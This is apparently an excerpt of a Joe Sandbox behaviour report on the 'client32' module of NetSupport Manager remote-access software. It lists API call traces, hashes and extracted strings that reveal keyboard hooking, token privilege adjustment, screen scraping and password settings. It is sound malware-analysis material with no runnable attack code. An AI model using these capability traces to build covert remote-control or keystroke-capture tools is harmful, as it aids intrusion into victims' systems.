                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,013808B8,013808B8,013808B8,013808B8,013808B8,013808B8,013808B8,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                                                                                                • EqualSid.ADVAPI32(?,013808B8,?,00000001,00000001), ref: 1109E9A3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InformationToken$AllocateEqualInitialize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1878589025-0
                                                                                                                                                                • Opcode ID: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                                                                                                • Instruction ID: 8f268d00a2632c5decc73a479da56acc1190ac8ef7b7f04f8431c56e7d3a1b5e
                                                                                                                                                                • Opcode Fuzzy Hash: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                                                                                                • Instruction Fuzzy Hash: 22217131B0122EABEB10DBA4CC81BBEB7B8EB44708F100469E919D7184E671AD00CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,59FD48C0,00080000,00000000,00000000), ref: 1109D46D
                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                                                                                                • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2349140579-0
                                                                                                                                                                • Opcode ID: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                                                                                                • Instruction ID: 1acc50509d1dc0efa8f8b8857b060522b21de2b31161cc556941a9c494b785c9
                                                                                                                                                                • Opcode Fuzzy Hash: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                                                                                                • Instruction Fuzzy Hash: AE015EB5640218ABD710DFA4CC89BAAF7BCFF44B05F10452DFA1597280D7B1AA04CB71
                                                                                                                                                                APIs
                                                                                                                                                                • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 81990902-0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • GetSystemMetrics.USER32(00002000), ref: 1102E7C4
                                                                                                                                                                • FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985
                                                                                                                                                                  • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                                                                                                  • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                                                                                                  • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                                                                                                  • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                                                                                                  • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
                                                                                                                                                                • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
                                                                                                                                                                • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB
                                                                                                                                                                  • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
                                                                                                                                                                  • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
                                                                                                                                                                  • Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89
                                                                                                                                                                • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1102EA6C
                                                                                                                                                                • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
                                                                                                                                                                • LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
                                                                                                                                                                • DestroyCursor.USER32(00000000), ref: 1102EE7E
                                                                                                                                                                • DestroyCursor.USER32(00000000), ref: 1102EE92
                                                                                                                                                                • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
                                                                                                                                                                • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
                                                                                                                                                                • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C
                                                                                                                                                                  • Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
                                                                                                                                                                  • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
                                                                                                                                                                  • Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                                                                                                  • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 1102FA96
                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
                                                                                                                                                                • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
                                                                                                                                                                • SetWindowPos.USER32(000802A6,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
                                                                                                                                                                • wsprintfA.USER32 ref: 1102FFA5
                                                                                                                                                                • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
                                                                                                                                                                • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
                                                                                                                                                                • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
                                                                                                                                                                • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F
                                                                                                                                                                  • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,59FD48C0,00000002,75732EE0), ref: 1112820A
                                                                                                                                                                  • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
                                                                                                                                                                  • Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
                                                                                                                                                                • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$562258$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                                                                                                • API String ID: 1099283604-2621191230

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _malloc_memsetwsprintf
                                                                                                                                                                • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$14/03/16 10:38:31 V12.10F8$562258$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                                • API String ID: 3802068140-38229974

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1661, function at 110a9c90 (node and edge listing omitted)
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(setupapi.dll,59FD48C0,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
                                                                                                                                                                • SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
                                                                                                                                                                • _free.LIBCMT ref: 110A9D60
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
                                                                                                                                                                • GetLastError.KERNEL32 ref: 110A9D9D
                                                                                                                                                                • _malloc.LIBCMT ref: 110A9DB3
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
                                                                                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110A9E1B
                                                                                                                                                                • GetLastError.KERNEL32 ref: 110A9E21
                                                                                                                                                                • _free.LIBCMT ref: 110A9E33
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110A9E44
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110A9E51
                                                                                                                                                                • _free.LIBCMT ref: 110A9E64
                                                                                                                                                                • FreeLibrary.KERNEL32(?,?), ref: 110A9E74
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                                                                                                • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                                                                                                • API String ID: 3464732724-3340099623

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1923, function at 1102dbc9 (node and edge listing omitted)
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                • String ID: $14/03/16 10:38:31 V12.10F8$562258$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s

Control-flow Graph: function beginning at 111414a0 (legend: Executed / Not Executed)
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 11141563
                                                                                                                                                                • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
                                                                                                                                                                • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
                                                                                                                                                                • _memset.LIBCMT ref: 111415F9
                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 11141649
                                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 11141653
                                                                                                                                                                • RegisterClassExA.USER32(?), ref: 1114166A
                                                                                                                                                                • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
                                                                                                                                                                • SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
                                                                                                                                                                • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
                                                                                                                                                                • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873
                                                                                                                                                                  • Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,59FD48C0,1102FCB2,00000000), ref: 1101747E
                                                                                                                                                                  • Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                                                                                                  • Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                                                                                                  • Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                                                                                                  • Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
                                                                                                                                                                  • Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                                                                                                • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll

Control-flow Graph: function beginning at 110285f0 (legend: Executed / Not Executed)
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,73D41370,?,0000001A), ref: 110286DD
                                                                                                                                                                • _strrchr.LIBCMT ref: 110286EC
                                                                                                                                                                  • Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileModuleName__stricmp_l_strrchr
                                                                                                                                                                • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat

Control-flow Graph: function beginning at 11086700 (legend: Executed / Not Executed)
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 110867EC
                                                                                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
                                                                                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
                                                                                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
                                                                                                                                                                • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                                                                                                • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                                                                                                • API String ID: 2201880244-3035937465
                                                                                                                                                                • Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                                                                                                • Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
                                                                                                                                                                • Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                                                                                                • Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 1114194A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Close
                                                                                                                                                                • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                • API String ID: 3535843008-2062829784
                                                                                                                                                                • Opcode ID: b095e62f5566da241d3e91ca5be9f891ca13435fdbaa530bea89b8198b644eef
                                                                                                                                                                • Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
                                                                                                                                                                • Opcode Fuzzy Hash: b095e62f5566da241d3e91ca5be9f891ca13435fdbaa530bea89b8198b644eef
                                                                                                                                                                • Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
                                                                                                                                                                • _strncpy.LIBCMT ref: 11074B68
                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 11074BCF
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00004000,11070C60,00000000,00000000,?), ref: 11074C6C
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11074C73
                                                                                                                                                                • SetTimer.USER32(00000000,00000000,000000FA,11063680), ref: 11074CB7
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 11074D68
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11074D83
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CritiusernitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                                                                                                • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                                                                                                • API String ID: 703120326-1497550179

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11108E0A
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11108E19
                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11108E2B
                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 11108E61
                                                                                                                                                                • GetProcAddress.KERNEL32(?,GrabKM), ref: 11108E8E
                                                                                                                                                                • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11108EA6
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11108ECB
                                                                                                                                                                  • Part of subcall function 1110F2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,776CC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                                                                                                  • Part of subcall function 1110F2B0: CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                                                                                                  • Part of subcall function 1110F2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                                                                                                  • Part of subcall function 1110F2B0: CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                                                                                                • GetStockObject.GDI32(0000000D), ref: 11108EDF
                                                                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 11108EEF
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000003C), ref: 11108F0B
